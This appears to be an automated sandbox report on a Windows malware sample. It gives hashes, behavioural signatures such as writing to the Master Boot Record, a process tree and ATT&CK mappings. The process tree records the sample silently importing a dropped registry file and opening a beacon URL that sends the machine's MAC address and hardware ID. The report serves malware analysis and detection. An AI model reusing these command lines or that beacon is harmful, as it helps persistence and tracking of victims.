Analysis

  • max time kernel
    133s
  • max time network
    152s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240412-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240412-enlocale:en-usos:windows10-2004-x64system
  • submitted
    20-04-2024 06:30

General

  • Target

    fc239744bad8d8efbe1ff2db4efc21bd_JaffaCakes118.exe

  • Size

    60KB

  • MD5

    fc239744bad8d8efbe1ff2db4efc21bd

  • SHA1

    6ebecbe46a6deb33c113a3e90a5e853b264d730b

  • SHA256

    eb046e06154fee919638727f5d53ee724da02a9db31a14fc6db9d917de208de4

  • SHA512

    166805c0e462589797e6ad6fe0b69a9cf437a2c1051a93537d5ecfc1cf493b7156e6d65b2ebe1d2eef523f2a2fa5677a8d9bef2b79ecd39da2b78eae9ab40286

  • SSDEEP

    768:VcYzYhaPMn84kg57lCeq1wonniiJMbO163IAVzP4/qn6MIMJy5rd/D:S0YhaPMaolChf12IAZP6qnet5rd7

Score
6/10

Malware Config

Signatures

  • Writes to the Master Boot Record (MBR) 1 TTPs 1 IoCs

    Bootkits write to the MBR to gain persistence at a level below the operating system.

  • Modifies Internet Explorer settings 1 TTPs 13 IoCs
  • Modifies registry class 14 IoCs
  • Runs .reg file with regedit 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious use of SetWindowsHookEx 7 IoCs
  • Suspicious use of WriteProcessMemory 11 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\fc239744bad8d8efbe1ff2db4efc21bd_JaffaCakes118.exe
    "C:\Users\Admin\AppData\Local\Temp\fc239744bad8d8efbe1ff2db4efc21bd_JaffaCakes118.exe"
    1⤵
    • Writes to the Master Boot Record (MBR)
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:228
    • C:\Windows\SysWOW64\cmd.exe
      cmd.exe /c regedit /s "C:\Users\Admin\AppData\Local\Temp\getback.reg"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:1804
      • C:\Windows\SysWOW64\regedit.exe
        regedit /s "C:\Users\Admin\AppData\Local\Temp\getback.reg"
        3⤵
        • Modifies registry class
        • Runs .reg file with regedit
        PID:3428
    • C:\Program Files\Internet Explorer\iexplore.exe
      "C:\Program Files\Internet Explorer\iexplore.exe" http://union.wanwan.cc/Stat.ashx?Mac=42F8DC9EC7DB&Hard=DD00013&ClientType=Home&Process=91&UserID=0040&Authen=841-443
      2⤵
      • Modifies Internet Explorer settings
      • Suspicious use of FindShellTrayWindow
      • Suspicious use of SetWindowsHookEx
      • Suspicious use of WriteProcessMemory
      PID:3556
      • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
        "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:3556 CREDAT:17410 /prefetch:2
        3⤵
        • Modifies Internet Explorer settings
        • Suspicious use of SetWindowsHookEx
        PID:3060

Network

MITRE ATT&CK Matrix ATT&CK v13

Persistence

Pre-OS Boot

1
T1542

Bootkit

1
T1542.003

Defense Evasion

Pre-OS Boot

1
T1542

Bootkit

1
T1542.003

Modify Registry

1
T1112

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Temp\getback.reg
    Filesize

    1KB

    MD5

    626e2d76f5c328d57a3eff6a7f94d129

    SHA1

    210fd33fa005775b30a8fd40a065a2e788934216

    SHA256

    5d9ae4b62924d6da9c35305bfd0d61c893767b7113f8b2f239da02057f8bee6e

    SHA512

    629290bd5791a42327b3b70a68609c6b0b9114365be8579553e01e6cbc98996c0fab475b88c0dd80d34dcc325453401c6cce26fb70ed67a9cb08271a07fd85a1

  • memory/228-0-0x0000000000400000-0x000000000040F000-memory.dmp
    Filesize

    60KB

  • memory/228-13-0x0000000000400000-0x000000000040F000-memory.dmp
    Filesize

    60KB